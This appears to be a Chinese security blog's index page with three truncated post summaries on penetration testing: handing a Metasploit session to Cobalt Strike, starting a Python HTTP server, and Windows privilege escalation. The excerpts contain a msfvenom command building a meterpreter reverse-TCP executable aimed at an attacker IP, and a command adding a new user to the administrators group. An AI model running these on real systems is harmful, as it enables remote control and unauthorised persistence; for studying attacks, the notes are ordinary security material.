摘要:
msf下的会话传给cs 首先在msf下获得一个meterpreter可以通过msfvenom生成payload msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.10.41 LPORT=8888 -f exe > shell. 阅读全文
摘要:
Python <= 2.3python -c "import SimpleHTTPServer as s; s.test();" 8000 Python >= 2.4python -m SimpleHTTPServer 8000 Python 3.xpython -m http.server 800 阅读全文
摘要:
提权小结 文件权限配置不当提权 普通提权 直接执行开启3389端口,执行net user username password /add & net localgroup administrators usernames /add 如果cmd被禁用,可尝试找可读、可写、可执行目录上传cmd.exe,然 阅读全文